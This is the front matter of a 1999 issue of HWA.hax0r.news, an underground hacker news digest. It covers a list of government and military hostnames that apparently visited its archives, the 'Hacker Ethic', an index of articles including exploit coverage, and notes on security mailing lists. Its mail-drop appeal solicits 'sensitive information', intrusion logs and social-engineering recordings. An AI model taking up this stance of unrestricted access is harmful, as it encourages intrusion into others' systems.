[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 43 Volume 1 1999 Nov 21st 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== Shit a week late again, another fucking cold, man I hate colds! fuck, anyway this issue covers Nov 14th - Nov 21st #44 will cover Nov 22nd to Nov 28th. Seen? ========================================================================== "ABUSUS NON TOLLIT USUM" ========================================================================== Today the spotlight may be on you, some interesting machines that have accessed these archives recently... _ _ _ _ | | | (_) | | |__| |_| |_ ___ | __ | | __/ __| | | | | | |_\__ \ |_| |_|_|\__|___/ homer.nawcad.navy.mil maggie.nawcad.navy.mil lisa.nawcad.navy.mil msproxy.transcom.mil b-kahuna.hickam.af.mil sc034ws109.nosc.mil infosec.se gate2.mcbutler.usmc.mil sc034ws109.nosc.mil shq-ot-1178.nosc.mil dhcp-036190.scott.af.mil mcreed.lan.teale.ca.gov dodo.nist.gov kwai11.nsf.gov enduser.faa.gov vasfw02,fdic.gov lisa.defcen.gov.au ps1.pbgc.gov guardian.gov.sg amccss229116.scott.af.mil sc022ws224.nosc.mil sheppard2.hurlburt.af.mil marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de fhu-ed4ccdf.fhu.disa.mil citspr.tyndall.af.mil kelsatx2.kelly.af.mil kane.sheppard.af.mil relay5.nima.mil host.198-76-34-33.gsa.gov ntsrvr.vsw.navy.mil saic2.nosc.mil wygate.wy.blm.gov mrwilson.lanl.gov p722ar.npt.nuwc.navy.mil ws088228.ramstein.af.mil car-gw.defence.gov.au unknown-c-23-147.latimes.com nytgate1.nytimes.com There are some interesting machines among these, the *.nosc.mil boxes are from SPAWAR information warfare centres, good to see our boys keeping up with the news... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= http://welcome.to/HWA.hax0r.news/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= Web site sponsored by CUBESOFT networks http://www.csoft.net check them out for great fast web hosting! http://www.csoft.net/~hwa =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= The Hacker's Ethic Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= A Comment on FORMATTING: Oct'99 - Started 80 column mode format, code is still left untouched since formatting will destroy syntax. I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns in the past I've endevoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= New mirror sites http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://net-security.org/hwahaxornews http://www.sysbreakers.com/hwa http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... ** Some issues are not located on these sites since they exceed the file size limitations imposed by the sites :-( please only use these if no other recourse is available. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. *DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.projectgamma.com/archives/zines/hwa/ http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #43 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ************************************************************************** ____| _| | __| | __ \ _ \ __| | __| | | __/ | _____|_| _| _|\___|\__| Eris Free Net #HWA.hax0r.news ************************************************************************** *** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed *** *** *** *** please join to discuss or impart news on from the zine and around *** *** the zine or just to hang out, we get some interesting visitors you *** *** could be one of em. *** *** *** *** Note that the channel isn't there to entertain you its purpose is *** *** to bring together people interested and involved in the underground*** *** to chat about current and recent events etc, do drop in to talk or *** *** hangout. Also if you want to promo your site or send in news tips *** *** its the place to be, just remember we're not #hack or #chatzone... *** ************************************************************************** =--------------------------------------------------------------------------= _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Bubbleboy email worm description................................. 04.0 .. WinNT.Infis.4608 new Win NT virus................................ 05.0 .. OSALL Interview with Flipz 1st person to deface a Microsoft site. 06.0 .. Online encrypted privacy for email and WWW....................... 07.0 .. More on the Chris Buckley Saga................................... 08.0 .. Security Practices Today, Or Lack Thereof ....................... 09.0 .. Internet Wiretapping Still a Possibility ........................ 10.0 .. Stock Prices Manipulated in China ............................... 11.0 .. Rumours: Vent of level Seven raided by FBI ...................... 12.0 .. Electronic Information Stolen from Egypt ........................ 13.0 .. Aleph One Gives NPR Interview ................................... 14.0 .. South American Con Announced .................................... 15.0 .. New Ezines Released ............................................. 16.0 .. BO2K Marketing Plan (Very funny reading, check this out)......... 17.0 .. Canada Loses Classified Documents ............................... 18.0 .. Guilty Plea in Media City Defacement ............................ 19.0 .. Hong Kong's Department of Highways Defaced ...................... 20.0 .. You Have No Privacy Anyway (scary) .............................. 21.0 .. ACLU to Monitor Echelon ......................................... 22.0 .. NSA Gets Patent on Analyzing Speech ............................. 23.0 .. New Ezine and Web Site - PrivacyPlace Launches .................. 24.0 .. Vendor Response Archive ......................................... 25.0 .. Another from Cuartango: More Microsoft Security Holes ........... 26.0 .. DOD helps Local Cops in Fighting CyberCrime ..................... 27.0 .. BSA Busts IRC Pirates ........................................... 28.0 .. US Concerned About Chinese Statements ........................... 29.0 .. The state of the net in Bulgaria................................. 30.0 .. More on the PIII chip ID......................................... 31.0 .. Security Lawsuits Next After Y2K ................................ 32.0 .. Another Singaporean Cyber Intruder Pleads Guilty ................ 33.0 .. SingCERT Releases Year to Date Stats ............................ 34.0 .. Canadian Telecom Firm Gets Security Clearance ................... 35.0 .. Dell Gets Some FunLove .......................................... 36.0 .. Melissa Hits Disney ............................................. 37.0 .. How the Anti Virus Industry Works ............................... 38.0 .. FBI Releases Anti Cyber Crime Video ............................. 39.0 .. Adobe Introduces Potentially Flawed Security System ............. 40.0 .. The 'Enemy' Speaks at Security Conference ....................... 41.0 .. Defense Fund Started for Warez4Cable + interviews................ 42.0 .. Menwith Hill To Get Upgrade Monies .............................. 43.0 .. CSIS Lost Classified Floppy Disk (hahaha)........................ 44.0 .. Hitachi Chip May Prevent Use of Third-party Printer Cartridges .. 45.0 .. NEW MACRO VIRUS OUT THERE........................................ 46.0 .. GLOBALNET, CROATIAN ISP COMPROMISED.............................. 47.0 .. SEC FILES CHARGES................................................ 48.0 .. G6 FTP SERVER v2.0 PROBLEMS...................................... 49.0 .. RED HAT SECURITY ADVISORY........................................ 50.0 .. HPING............................................................ 51.0 .. RPM UPDATE HELPING UTILITY....................................... 52.0 .. WebBBS Ver2.13 Exploit / Shadow Penguin Security................. 53.0 .. SENATE.GOV BITES THE DUST........................................ 54.0 .. NEW NESSUS....................................................... 55.0 .. DELEGATE BUFFER OVERFLOWS ....................................... 56.0 .. SSH PROBLEMS..................................................... 57.0 .. TORVALDS: COUPLE OF QUESTIONS.................................... 58.0 .. 2K PREPARATIONS CAUSED PROBLEMS.................................. 59.0 .. IS MICROSOFT TO BLAME FOR Y2K?................................... 60.0 .. $50 MILLIONS FOR Y2K CENTER...................................... 61.0 .. EYES ON EXEC 2.32................................................ 62.0 .. CHECKPOINT AND LINUX............................................. 63.0 .. NOVELL SIMPLIFIES THINGS......................................... 64.0 .. RPC.NFSD PROBLEMS................................................ 65.0 .. Eserv 2.50 Web interface Server Directory Traversal Vulnerability 66.0 .. RFP9906 - RFPoison............................................... =-------------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.......... Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Websites; sAs72.......................: http://members.tripod.com/~sAs72/ Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/ @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? Comments: To: InfoSec News To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs. @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@home.com......: currently active/programming/IRC+ Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) 